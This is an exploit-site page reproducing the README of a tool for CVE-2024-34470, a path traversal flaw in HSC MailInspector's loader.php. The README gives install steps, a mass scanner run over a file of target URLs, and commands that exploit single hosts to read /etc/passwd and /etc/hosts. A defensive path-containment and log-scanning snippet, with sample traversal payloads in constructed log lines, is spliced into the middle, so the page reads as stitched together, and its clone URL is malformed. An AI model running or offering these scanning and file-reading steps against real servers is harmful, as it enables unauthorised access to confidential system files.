## https://sploitus.com/exploit?id=CE2C9321-507E-5995-8D17-AE1556D7139A
# HSC MailInspector - CVE-2024-34470
___
A critical vulnerability has been found in HSC Mailinspector up to version 5.2.18. It affects an unknown function of the file /public/loader.php: manipulating the 'path' argument with crafted input leads to a path traversal vulnerability, classified as CWE-22. The product uses external input to construct a pathname intended to identify a file or directory beneath a restricted parent directory, but does not properly neutralize special elements within that pathname, so it can resolve to a location outside the restricted directory. This affects confidentiality, integrity, and availability.
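The CWE-22 pattern described above, shown from the defender's side as an added example (this is not code from the repository or from HSC): `safe_resolve()` is the containment check a file loader needs before opening a user-supplied path, and `find_traversal_requests()` runs that same check over access-log requests to `/public/loader.php` to flag `path` values that escape the web root. `WEB_ROOT`, the log format and the log lines are constructed assumptions, not taken from the product.

```python
import os
import re
from urllib.parse import parse_qs, unquote, urlsplit

WEB_ROOT = "/srv/mailinspector"  # assumed install path; not given on the page

def safe_resolve(base_dir, user_path):
    """Return the canonical path if user_path stays inside base_dir, else None.

    realpath collapses '.', '..' and symlinks, so the check runs on the path
    the OS would actually open, not on the raw string (a plain '../' string
    filter misses encoded and symlinked variants).
    """
    if "\0" in user_path:  # NUL would truncate the name in C-based code
        return None
    base = os.path.realpath(base_dir)
    # join() discards base for an absolute user_path, so "/etc/passwd"
    # resolves outside base and fails the prefix check below.
    target = os.path.realpath(os.path.join(base, user_path))
    if target == base or target.startswith(base + os.sep):
        return target
    return None

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<url>\S+) HTTP/[\d.]+"')

def find_traversal_requests(log_lines):
    """Return (url, decoded path argument) for loader.php requests whose
    'path' argument would escape WEB_ROOT. parse_qs decodes once; the
    extra unquote catches a second layer of percent-encoding."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = match.group("url")
        parts = urlsplit(url)
        if not parts.path.endswith("/public/loader.php"):
            continue
        for raw in parse_qs(parts.query).get("path", []):
            candidate = unquote(raw)
            if safe_resolve(WEB_ROOT, candidate) is None:
                hits.append((url, candidate))
    return hits

# Constructed access-log lines (common log format), not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2025:10:00:00 +0000] "GET /public/loader.php?path=img/logo.png HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2025:10:00:01 +0000] "GET /public/loader.php?path=../../../../etc/passwd HTTP/1.1" 200 1843',
    '10.0.0.9 - - [01/Jan/2025:10:00:02 +0000] "GET /public/loader.php?path=..%2F..%2F..%2Fetc%2Fhosts HTTP/1.1" 200 220',
    '10.0.0.7 - - [01/Jan/2025:10:00:03 +0000] "GET /index.php HTTP/1.1" 200 3000',
]
```

Running `find_traversal_requests(SAMPLE_LOG)` returns the two loader.php requests whose decoded `path` leaves the web root; the benign `img/logo.png` request and the non-loader request are not reported.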
___
## Installation

**Clone the repository:**
```bash
git clone https://CVE-2024-34470.git
cd CVE-2024-34470
```

**Install the dependencies**

Make sure you have Python and pip installed. Then, run:
```bash
pip install -r requirements.txt
```

- This will install all the necessary dependencies to run the script.
___
## Use

### Script Description

To perform a search for multiple targets using a text file, use the script **Massive_CVE-2024-34470.py**

```bash
$ python3 Massive_CVE-2024-34470.py urls.txt urls_vulnerable.txt 2>/dev/null
```

The _urls.txt_ file should contain one target URL per line, for example:
```text
https://10.18.97.2
http://domain.com
https://192.8.7.2:4443
```

![Screenshot_1.png](https://github.com/Mr-r00t11/CVE-2024-34470/blob/main/img/Screenshot_1.png)
___
Once the vulnerable targets have been identified, use the script **CVE-2024-34470.py** against a single target to exploit the issue and display the contents of the file specified on the command line.

```bash
# Read the contents of /etc/passwd
$ python CVE-2024-34470.py http://example.com /etc/passwd 2>/dev/null

# Read the contents of /etc/hosts
$ python CVE-2024-34470.py http://example.com /etc/hosts
```

![Screenshot_2.png](https://github.com/Mr-r00t11/CVE-2024-34470/blob/main/img/Screenshot_2.png)